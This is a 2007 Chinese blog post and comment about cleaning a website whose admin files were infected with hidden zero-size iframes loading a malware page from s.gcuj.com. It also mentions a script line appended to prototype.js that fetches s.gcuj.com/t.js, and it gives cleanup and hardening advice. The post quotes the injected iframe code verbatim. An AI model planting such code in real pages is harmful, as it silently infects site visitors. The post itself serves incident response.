恐怖的s.gcuj.com,附处理办法
2007-5-18 11:16:33

用的风讯的程序,前些时候进后台的时候,杀毒软件经常提示有"s.gcuj.com"这个提示是恶意脚本.

今天仔细检查了一下,整个程序admin文件中的全部文件都被加上了以下代码:

<iframe src="http://s.gcuj.com/bd.htm?019" width="0" height="0" frameborder="0"></iframe><iframe src="http://s.gcuj.com/bd.htm?019" width="0" height="0" frameborder="0"></iframe><iframe src="http://s.gcuj.com/bd.htm?019" width="0" height="0" frameborder="0"></iframe>

上网一查有人说这是被值入的木马,我晕..., 所有后台管理的文件都有以上这串代码,

这该如何解决?我把后台登陆的这个代码删除后,发现admin系统管理员帐户登陆不上去了,其他的还可以,

不知道是我长时间没有登陆导致的还是被删除这段代码后登陆不上去?

但总的一句话,上面这串代码已经认定为是木马,现在着急要处理,否则以后可能会麻烦..

 

2007年5月24日最新增加:

把网站上所有文件下载到本地计算机,然后用DREAMWAVER在整个网站查找gcuj,那还不快,几分钟以后,在我网站的prototype.js文件的最后多出一行,用脚本程序document.write写向了"s.gcuj.com/t.js",删除,重新上传,还是报有病毒,一想,原来是临时文件,点开IE的工具下的选项,把IE临时文件清除,终于OK了。据库到本地运行个新的论坛文件看看,是否是数据库问题,如果数据库没有问题,建议你替换一下论坛文件。做之前请先备份。 

网站后台因此打不开:应该是这个原因,你可以看一下是否是在 index.asp  conn.asp  里加上的代码。如果找不到,建议你下载数据库到本地运行个新的论坛文件看看,是否是数据库问题,如果数据库没有问题,建议你替换一下论坛文件。做之前请先备份。


    
« 保健按摩手法大学生一定要理解的15件事 »
  • quote 1.反病毒
  • http://www.Gadmin.cn
  • 这是典型的被恶人挂了iframe马了 !
    这种情况最常见的原因是:
    1、程序用的是免费的,程序本身带有这种毒,只要程序一旦运行在internet上,程序提供商只要一运行某个文件,全站文件全部被挂!
    2、网站管理员本地就带有某某病毒,在进行网站后台编辑生成文章的时候,就在生成文章的那一刹那,就把本地的木马上传到空间里了。。一执行,全站全部带有这个马。
    3、最常见的论坛开放注册会员,尤其是动网论坛有漏洞,别人可以注入给你批量挂马,你的论坛就over 了; 或者 论坛开放了上传N多个权限, 上传的后缀文件的格式太多,别人利用这一漏洞,给你论坛里传个东西,然后一执行,全站都挂!
    4、如果用的是虚拟主机,虚拟主机的空间与空间之间权限都是非常严格的,A空间里的马跑不到B空间里,所以这点就不必担心是服务器里有病毒。
    现在马上要作的就是:
    A、把空间里的文件下载下来,把空间彻底清空,在本地用字符替换器查找和替换这个iframe的马,替换为空格。 一次性清空
    B、给会员很少的权限,不要有半点空子可转。
    C、后台路径经常变换。密码经常换。
    D、用免费的程序一定要自己检查下。
  • 2007-8-4 11:30:47

发表评论:

请注意: 评论部分采用Ajxa架构,您的评论可能会延迟显示出来。
请用心发表,您的评论将会让更多的人看到。评论仅代表网友观点,与本站立场无关

热  点:A、结交全国各地的网友!  B、2008年新劳动法全文下载
快讯1:A、劳动争议调解仲裁法      B、♥ 中国四川地震捐款全接触 ♥
快讯2:2007中国城市GDP排名解读预测!

◎声明:转载本文时请务必以超链接形式标明文章原始出处和作者,本文严禁商业网站转载。
Powered By Z-Blog 1.7 Copyright (2006~2007) ieeye.com. All Rights Reserved.